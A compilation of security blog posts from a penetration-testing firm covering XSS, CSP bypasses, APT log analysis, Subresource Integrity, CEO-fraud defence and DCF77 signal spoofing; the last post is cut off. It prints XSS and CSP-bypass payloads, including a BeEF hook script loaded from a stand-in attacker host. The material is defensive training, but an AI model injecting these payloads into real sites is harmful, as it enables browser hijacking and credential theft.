Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, often referred to as "XSS", is a common vulnerability of web applications. The vulnerability arises when a web application fails to sufficiently encode user-provided data before displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

One of our main tasks at Compass Security is testing web applications for security issues. From this experience we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity's sake, XSS is usually demonstrated with a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

"><script>alert(0)</script><!--

which will lead to the following being sent to the user:

<input type="text" name="param" value=""><script>alert(0)</script><!--">

resulting in the above popup being displayed.
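The mechanics of this reflection can be reproduced with a few lines of Python (a purely illustrative stand-in for the server-side templating; the template string is hypothetical):

```python
# Naive server-side templating without output encoding (for illustration only).
template = '<input type="text" name="param" value="{}">'

benign = "hello"
payload = '"><script>alert(0)</script><!--'

print(template.format(benign))
# <input type="text" name="param" value="hello">

# The payload closes the value attribute and the input tag,
# then injects a script element of its own:
print(template.format(payload))
# <input type="text" name="param" value=""><script>alert(0)</script><!--">
```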

When discussing XSS with customers, one of the more common statements we hear is: "this issue is harmless; it only displays text in a popup window". This is not true, however: XSS is far more powerful than often suspected, as it allows an attacker to take full control over the victim's browser (the victim being the user who visits the attacked website). Common attack vectors include stealing the victim's session cookie, if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a phishing website, allowing the attacker to obtain the user's credentials. Finally, if the victim's browser is outdated and contains known vulnerabilities, these can be exploited directly via Cross-Site Scripting and, if successful, lead to the victim's computer being compromised.

Many of the above-mentioned attack vectors can easily be tested using BeEF, the Browser Exploitation Framework (http://beefproject.com/). This framework provides many attack vectors that can be launched by including just one malicious JavaScript file in the vulnerable website. Hence, instead of the above code ("><script>alert(0)</script><!--), the following would be injected:

"><script src=http://attacker.com/hook.js></script><!--

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:


Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

Once the user has entered their password, it is sent to the attacker:

How to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:

  • " is encoded as &quot;,
  • < is encoded as &lt;,

and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).
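In Python, for instance, the standard library already provides this encoding via html.escape (an illustrative sketch; most web frameworks and template engines offer an equivalent):

```python
import html

template = '<input type="text" name="param" value="{}">'
payload = '"><script>alert(0)</script><!--'

# html.escape replaces &, <, >, " (and ' by default) with HTML entities.
safe = html.escape(payload)
print(safe)
# &quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;&lt;!--

# The payload is now rendered as inert text inside the attribute.
print(template.format(safe))
```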

If you want to see these and many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives, it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently, CSP version 2 is supported by Firefox, Google Chrome, and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer) [4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

The policy, in order to work, has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser will then parse the CSP and check if every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <object>
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of sources from which the corresponding resources may be loaded. If a directive is omitted, the default behavior is to allow everything ("*") without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive "default-src" is set to 'self', which means same origin: all resources without their own directive may only be loaded from the same origin, in this case "blog.compass-security.com". Setting the "default-src" directive can be a good start when deploying a CSP, as it provides a basic level of protection. "script-src" allows all JavaScript to be loaded from the domain "compass-security.com", via HTTP (https:// has to be specified explicitly) and without allowing subdomains. Subdomains could be specified directly (e.g. sub.compass-security.com) or using the "*" wildcard (*.compass-security.com).
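To make the structure of such a header explicit, the following Python sketch splits a policy into its directives (a deliberately minimal, illustrative parser, not a spec-complete one):

```python
def parse_csp(header_value):
    """Split a CSP header value into {directive: [source, ...]}.
    Minimal sketch; a real parser handles many more edge cases."""
    policy = {}
    for part in header_value.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy

csp = "default-src 'self'; script-src compass-security.com"
print(parse_csp(csp))
# {'default-src': ["'self'"], 'script-src': ['compass-security.com']}
```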

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfigurations or ambiguities can render the policy less effective or easy to bypass. In addition, the functionality of the application could also be broken. The following example illustrates what can happen if "default-src" is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all scripts originating from "compass-security.com" are allowed. But what about other objects like stylesheets or Flash applets? The policy above can be bypassed, for example, with the following payload, which triggers an alert box using a Flash object [7]:

">'><object type="application/x-shockwave-flash"
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

One other common mistake is the inclusion of the dangerous 'unsafe-inline' or 'unsafe-eval' keywords. These allow the execution of potentially malicious JavaScript directly via "<script>" tags or eval(), respectively:

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy sets the default source to 'self' and allows scripts from "compass-security.com", but at the same time it allows the execution of inline scripts. This means the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides the trivial misconfigurations shown above, there are other, less well-known tricks to bypass a CSP. These make use, for example, of JSONP (JSON with Padding) endpoints or open redirects. Let's take a look at JSONP bypasses first.

If the CSP whitelists a domain that hosts a JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assume that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains valid JavaScript code? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then reflect the callback parameter, generating the following response:

alert(1); u({...})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.
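The reflection at the heart of this bypass can be modeled with a toy JSONP endpoint in Python (the function and data are hypothetical; a real endpoint should restrict the callback to a safe identifier):

```python
import json

def jsonp_response(callback, data):
    """Toy JSONP endpoint: reflects the callback parameter verbatim.
    This unchecked reflection is exactly what enables the CSP bypass."""
    return "{}({})".format(callback, json.dumps(data))

# Legitimate use:
print(jsonp_response("handleData", {"user": "alice"}))
# handleData({"user": "alice"})

# Abused callback, as in the payload above:
print(jsonp_response("alert(1);u", {"user": "alice"}))
# alert(1);u({"user": "alice"})
```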

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine if the policy is set to be very restrictive, allowing only one specific file and domain in its “script-src” directive:

Content-Security-Policy: default-src 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems very restrictive: only myfile.js can be loaded, along with all scripts originating from "redirect.compass-security.com", a site we trust. However, redirect.compass-security.com performs open redirects via a parameter in the URL. This makes it possible to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why does this payload bypass the CSP? The CSP does not check the landing page after a redirect occurs, and since the source of the script tag, "https://redirect.compass-security.com", is whitelisted, no policy violation is triggered.

These are only a small subset of the possible CSP bypasses. If you are interested, many more can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism based on URLs, CSP2 offers other techniques to block code injection attacks. One of these is nonces.

Nonces are randomly generated values that are declared in the CSP and included as an attribute of the legitimate <script> or <style> tags, providing a mapping between the policy and the client's browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, so the CSP detects the injection and throws a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.
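Generating a nonce that meets these requirements is straightforward; here is an illustrative Python sketch using the standard library's secrets module (function and variable names are our own):

```python
import secrets

def csp_nonce():
    """Generate a fresh CSP nonce: 16 random bytes = 128 bits,
    Base64url-encoded so it is safe to embed in a header or attribute."""
    return secrets.token_urlsafe(16)

# A new nonce must be generated for every response:
nonce = csp_nonce()
header = "Content-Security-Policy: script-src 'nonce-{}'".format(nonce)
print(header)
```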

This value should then be passed to each script tag included in our application's pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12"></script>

The browser will then parse the CSP, check whether the included scripts have a matching nonce value, and block those that do not. This technique works well against stored XSS, as the attacker cannot include a valid nonce at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag itself rather than for the source of the script. It is also possible to use hashes to identify the content of each <script> element inside the page; more information about this feature can be found at [8].

Conclusion

We have seen that the CSP is a very useful tool web developers can use to gain better control over the resources loaded in their pages. The different directives provide the flexibility to allow or deny potentially dangerous web resources. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first protection against code injection should always be solid input/output validation, which also helps against other common attacks like SQL injection.

If you would like to get more information about how web applications should be protected, or you want to deepen your web security knowledge, we provide different trainings:

We are also offering trainings in other areas of IT Security. You can check the different topics here:

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they did not have to worry about targeted attacks because they considered themselves to be "flying under the radar". The common belief has been: "We are too small; only big organizations like financial service providers, the military industry, energy suppliers and government institutions are affected".

However, this assumption has been proven wrong at least since the detection of Operation Shady RAT [0], DarkHotel [1] or the recent RUAG cyber espionage case [2]. The analysis of the Command & Control (C&C) servers of Shady RAT revealed a large-scale operation that ran from 2006 to 2011, during which 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APTs) will only increase in the near future.

We at Compass Security are often asked to help find malicious actions or traffic inside corporate networks.

The infection is, in most cases, a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities; this varies from case to case. Often we observe in proxy logs that employees were lured into visiting phishing sites designed to look exactly like the corporation's Outlook Web Access (OWA) or similar applications/services used by the targeted company.

Typically, this is not something you can prevent with technical measures alone – user awareness is the key here! Nevertheless, we are often called in to investigate when there is still malware activity in the network. APT traffic can then be detected by correlating DNS, mail, proxy, and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass Analysts first have to know the network’s topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time. This is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies already collect logs on central servers [3], which speeds up the investigation, since administrators don't have to collect the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult for attackers to clear.

To analyze logs and sometimes traffic dumps, we use different tools such as ELK (Elasticsearch, Logstash, Kibana), Splunk, and Moloch.

ELK offers many advantages when it comes to clustering and configuration, but it doesn't ship with many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase [4]. Otherwise, there are plenty of tools that help you build them on your own, e.g. the Grok Debugger [5].
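To illustrate what such a parser rule does, here is a hand-written Python equivalent for a squid-style proxy log line (the log format is assumed purely for illustration; a Grok pattern compiles down to a named regex much like this):

```python
import re

# Named-group regex for a hypothetical proxy log line:
# "<timestamp> <client-ip> <status> <method> <url>"
LINE = re.compile(
    r"(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<status>\d{3})\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

sample = "1466432630.123 10.0.0.42 200 GET http://example.com/index.html"
m = LINE.match(sample)
print(m.groupdict())
# {'ts': '1466432630.123', 'client': '10.0.0.42', 'status': '200',
#  'method': 'GET', 'url': 'http://example.com/index.html'}
```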

However, when an analysis has to be kick-started fast and you do not have time to configure large rulesets, Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

In a first step, we try to clean the data set by removing noise: we identify known good traffic patterns and exclude them. Of course, it is not always straightforward to distinguish between normal and suspicious traffic, as some malware uses, for example, Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even more, we then look for connections to known malware domains.

There are plenty of publicly available lists of known malware domains for this purpose.

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations selling services just for the purpose of hosting malware infrastructure). More sophisticated attackers, however, will most likely use their own infrastructure.

After cleaning the data sets, we look for anomalies in the logs (e.g. large numbers of requests, single requests, unusually big DNS queries, etc.). Some malware is really noisy and, as a consequence, easy to find: some samples connect to their C&C servers at high frequency, others request commands from the C&C servers at regular intervals (Friday 20:00, for example), and others connect just once.
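A very simple version of this frequency-based anomaly hunting can be sketched in Python (the domains, counts and threshold are made up for illustration):

```python
from collections import Counter

# Toy proxy-log excerpt: (client, destination domain) pairs.
requests = (
    [("10.0.0.5", "updates.vendor.example")] * 3
    + [("10.0.0.5", "c2.badhost.example")] * 500   # high-frequency beaconing
    + [("10.0.0.9", "news.example")] * 10
)

per_domain = Counter(domain for _, domain in requests)

# Flag domains whose request count is far above the rest (naive threshold).
threshold = 100
suspicious = [d for d, n in per_domain.items() if n > threshold]
print(suspicious)
# ['c2.badhost.example']
```

In practice the threshold would be derived from the network's baseline rather than hard-coded, and timing regularity (e.g. fixed beacon intervals) is often a stronger signal than raw volume.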

Sometimes we also detect anomalies in the network which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these turn out to be false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next training takes place on 22 and 23 September 2016 in Jona; click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, publicly released on 17 March 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection that start already at boot time. Minimum hardware requirements therefore include UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to an MDM solution, the device can use the TPM for the new health attestation service to provide conditional access to the company network and its resources, and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end-users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft BitLocker technology. Companies using an MDM solution also have fine-grained control over the used encryption method and cipher strength. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features also include biometric authentication using Windows Hello (selected premium devices only for the moment) and Enterprise Data Protection (EDP), which helps separate personal and enterprise data and serves as a data loss protection solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations, the Mobile edition updates automatically. Users of the Windows 10 Mobile Enterprise edition, however, have the option to postpone the download and installation of updates.

In addition, the presentation introduces the Windows Bridges that help developers port existing mobile applications to the new platform. While a preview version for iOS (Objective-C) has been made publicly available, Microsoft recently announced that the Windows Bridge for Android project has been cancelled. In the same week, Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider, to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

References:

This blog post resulted from internal research which has been conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is being broadcast by TVO, we had to slip into tuxedos and play the "license to hack" story. Please watch the teaser video on YouTube!


The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don’t yet know the final score but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan

 

Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. The correct implementation and configuration is crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with the SAML Burp Extension (SAML Raider) developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18:00-19:00, Jona
– January 21, 2016, 18:00-19:00, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

Websites nowadays are mostly built with resources from different origins. For example, many sites include scripts or stylesheets like jQuery or Bootstrap from a Content Delivery Network (CDN). This means that webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load content from an attacker-controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? Until now, a security-aware webmaster had no way to protect a website against such an incident.

This is where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources with an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource that is to be integrated into the site. The browser then checks whether the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, the resource bootstrap.min.css is checked for its integrity with its Base64-encoded SHA-384 hash. If the integrity check succeeds, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed when the check fails and a resource therefore could not be loaded; the failed request can only be seen in the developer tools of the browser. The following image shows the error message in the Chrome developer tools.

Console in browser does inform about subresource integrity check fail.
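The integrity value itself can be computed with a few lines of Python (an illustrative sketch; the same value can also be produced with the openssl command line):

```python
import base64
import hashlib

def sri_hash(content: bytes) -> str:
    """Compute the value for the integrity attribute:
    'sha384-' + Base64(SHA-384 digest of the exact file bytes)."""
    digest = hashlib.sha384(content).digest()
    return "sha384-" + base64.b64encode(digest).decode()

# Hypothetical stylesheet content; in practice, hash the exact file
# that the CDN serves, since any byte difference fails the check.
css = b"body { margin: 0; }"
print(sri_hash(css))
```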

The crossorigin attribute in the example configures the CORS request. The value anonymous indicates that requests for this element will not have the credentials flag set, and therefore no cookies are sent. The value use-credentials indicates that the request will provide cookies to authenticate.

The Subresource Integrity attribute is currently being reviewed before becoming a W3C standard, but it is already supported by Chrome 45 and later, Firefox 43 and later, and Opera 32 and later.

Concluding, the Subresource Integrity attribute gives webmasters a better way to ensure the integrity of external resources. However, the attribute is not supported by older browsers and needs to be adjusted on every resource change. In the end, a security-aware webmaster retains more control with less effort by hosting all resources on their own servers.

Come’n’Hack Day 2015

Being a security analyst at Compass Security is an interesting thing, no doubt. Besides interesting projects, there is plenty of know-how transfer and interaction between the employees. For example, each year, all security analysts come together for an event called Come'n'Hack Day. During this year's event, they had the pleasure of competing in an attack/defense hacking contest against each other.


Hacking-Lab‘s new Capture The Flag (CTF) system was used for this purpose. It was only the second time this system was used for an event, after the premiere at the European Cyber Security Challenge final last October in Lucerne.


The participants were spread across three teams: Proxy Foxes, Lucky Bucks and Chunky Monkeys. Each team owned servers with running applications and had different tasks to perform in order to score points:

  • ATTACK – Attack the other teams' applications and steal a gold nugget.
  • DEFENSE – Protect their own applications.
  • CODE-PATCHING – Find and patch vulnerabilities in their own applications.
  • AVAILABILITY – Keep their own applications up and running.
  • JEOPARDY – Solve hacking challenges (cryptography, networking, etc.).
  • POWNED – Try to exploit the other teams' servers.

After a hard fight, the Chunky Monkeys grabbed the first place, closely followed by the Lucky Bucks:


Almost one hundred gold nuggets were stolen during the day.

All attendees enjoyed the highly eventful day. With six different ways to score points, each participant could contribute to their team's success. This makes such a CTF not only a great social event for security analysts but potentially for any organization with technically skilled employees (IT security officers, sysadmins and/or developers)!

What is a “Fake President Fraud” and how to Protect Your Company

"Fake President Fraud" or "CEO Fraud" is a social engineering attack in which an adversary tries to convince a member of the financial department of a company to send a payment to the attacker's bank account. The attack can be divided into three steps.

  1. Establish Contact:
    Typically, only employees responsible for bank transfers are contacted by the adversary, as they have all the permissions needed to execute payments. The criminal therefore impersonates the CEO or another superior who has enough authority to arrange urgent payments.
    These kinds of social engineering attacks work if the adversary gathers enough information about the individual he wants to impersonate. As most CEOs are referenced on the world wide web with detailed personal information such as a curriculum vitae and email address, it is easy for an attacker to gather everything he needs to fake a CEO email. Furthermore, company websites often disclose information about customers and other useful details which help an adversary appear more convincing when requesting a payment.
  2. Request Payment Transaction:
    The attacker often uses email (spear phishing) or phone calls (vishing) to contact his target. While a phone call only works if the victim does not know the voice of the impersonated superior, an attack over email has no such restriction.
    The request itself concerns an urgent payment to a foreign bank account and uses a variety of pretexts such as acquisitions or customer projects. For this step to succeed, the criminal uses different elements to convince the target to comply with his request and send out the payment:

    1. Authority: Approaching the target as an authority figure adds a strong argument to every request. Jonathan J. Rusch writes: "People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present." One of the most impressive experiments in the history of social psychology, which demonstrated blind obedience to authority figures, is the Stanley Milgram experiment.
    2. Valorization: The "fact" that the CEO or a superior has "chosen" this specific employee implies that he trusts him. The feeling of being trusted makes the body release oxytocin, often referred to as the "love hormone". This hormone facilitates trust and attachment between individuals, an additional factor that helps the attacker quickly build rapport and convince the target to comply with his request and send out the payment.
    3. Secrecy: In order to prevent the target from verifying the authenticity and validity of the order, attackers often label the request as "STRICTLY CONFIDENTIAL" or insert statements like "this project is still secret and its success depends on this transaction".
    4. Pressure: Shifting all the responsibility for the success or failure of a project to the target’s shoulder, the attacker put a lot of pressure on him. This will induce the victim to be more compliant and execute the request.
    5. Urgency: Urgency and authority is a good combination to convince the target to perform the payment as fast as possible. The attacker creates a false sense of urgency in order to get the target to make a rushed judgment or a rash decision. Example email:ceofraud
  3. Transfer Money:
    If the attacker manages to convince the targeted employee to send out the payment, the money is transferred to the foreign bank account.

 

Now the question arises what a company can do to avoid a “Fake President Fraud”. Various organizational and technical measures can be taken to mitigate the risk of an incident.

  1. Organizational:
    1. If possible, large payments should not be authorized via email or phone; face-to-face meetings should be mandatory instead.
    2. Develop and communicate guidelines and processes for how payment transactions are to be handled.
    3. If a transaction does not fit the defined process, the employee should be required to ask verification questions that confirm it is an authorized request.
    4. Employees should participate in dedicated social engineering training to learn how to avoid being manipulated by an attacker. The goal of the course should be to convey how an attacker thinks, raise general awareness of social engineering attacks, and explain that such attacks are not limited to one communication channel (e.g. email, SMS, WhatsApp, in person).
    5. Publish only as little financial and personal information on social media and company websites as necessary. This makes it harder for an adversary to prepare his attack.
    6. A two-step (4-eyes) verification process when sending out large amounts of money to foreign bank accounts helps mitigate the damage of an attack. It is important that the company’s culture allows the second person to actually review the payment and challenge the first person, without either of them fearing a “Big Brother” system.
    7. Do not allow employees to use their personal email addresses for business purposes. This prevents a compromised private email account from giving an attacker access to business data.
  2. Technical:
    1. Configure your mail server to reject emails from external mail servers whose sender address contains your own domain name.
    2. Always use email signatures/encryption (e.g. S/MIME, PGP), at least when sending mails with confidential and/or sensitive content.
    3. Mark emails from external mail servers with a tag inside the subject (e.g. [EXTERNAL]). This should be done when the emails enter the company’s mail server. With conditional formatting, such mails can additionally be displayed in red if they originate outside the company.
    4. To prevent Outlook Web Access from being compromised and used to perform a CEO fraud, a strong authentication method should be used in addition to a strong password policy (e.g. client certificates, two-factor authentication, or restricting access to VPN traffic only).
    5. Attackers may register and use similar-looking domains for a CEO fraud attack. To be aware of this, the company should check whether similar domains already exist (e.g. .co instead of the .com top-level domain) and blacklist them on its mail server.
    6. Additionally, the company should try to register all similar-looking domains itself to make it harder for an attacker to register a domain that looks only slightly different from the company’s.
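As an illustration of points 5 and 6, the enumeration of candidate lookalike domains for blacklisting could be sketched as follows. This is a minimal example, not an exhaustive generator; the domain name, the TLD list, and the substitution table are hypothetical examples:

```python
def lookalike_domains(domain):
    """Generate simple lookalike variants of a company domain:
    alternative top-level domains and common character substitutions."""
    name, _, tld = domain.rpartition(".")
    variants = set()
    # Swapped top-level domains (e.g. .co instead of .com).
    for alt_tld in ("co", "com", "net", "org", "cm"):
        if alt_tld != tld:
            variants.add(f"{name}.{alt_tld}")
    # Visually similar character substitutions.
    substitutions = {"o": "0", "l": "1", "i": "1", "m": "rn"}
    for old, new in substitutions.items():
        if old in name:
            variants.add(f"{name.replace(old, new)}.{tld}")
    return sorted(variants)
```

For example, `lookalike_domains("example.com")` yields variants such as `example.co`, `examp1e.com`, and `exarnple.com`, which could then be blacklisted on the mail server or defensively registered.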

Even though the described attack is a real threat, exploited by attackers around the world every day, there are effective steps to mitigate the risk of an incident, as shown above. An awareness training in which employees are taught when to be suspicious and how attackers try to manipulate people is especially recommended, as this is the best protection against all types of social engineering attacks.

DCF77 Time Signal Manipulation

This article shows how easily the DCF77 time signal, broadcast via radio, can be manipulated. DCF77 is used in many areas where an accurate time is required: from simple wristwatches to industrial plants.

What is DCF77

The DCF77 time signal transmitter has existed in Europe since 1959. The transmitter has a range of 2000 km and is located in Mainflingen, Germany. Three atomic clocks serve as the time base. Some newer receivers use GPS instead of DCF77, but have the disadvantage of requiring an outdoor antenna for reception. Solutions with an Internet connection, on the other hand, usually obtain their time over the network.

Image source: https://de.wikipedia.org/wiki/DCF77#/media/File:Dcf_weite.jpg

DCF77 range map

Where is DCF77 used

DCF77 is used, among other places, in: church tower clocks, traffic light systems, tariff switching clocks of energy suppliers, industrial environments, servers, public transport, broadcasting, and ordinary alarm clocks and wristwatches.

What are the consequences of a time manipulation

If a neighbor’s alarm clock is manipulated, the resulting damage is generally limited. In contrast, in automation solutions such as those found in the food or chemical industry, incorrect process times can cause immense damage.
The effects can also be felt in IT communication, e.g. if computer certificates lose their validity after a time manipulation because their validity date has expired. Encrypted communication then fails.

A home-built DCF77 transmitter

Unlike receivers, DCF77 transmitters are hardly available to the public. But what if you want to transmit a DCF77 signal yourself? The time required to build a short-range transmitter (hardware and software) is about the same as that needed to build your own receiver. The information required to build a transmitter (protocol, transmission frequency, modulation) is easy to find on the Internet, since it is also needed to build a receiver.

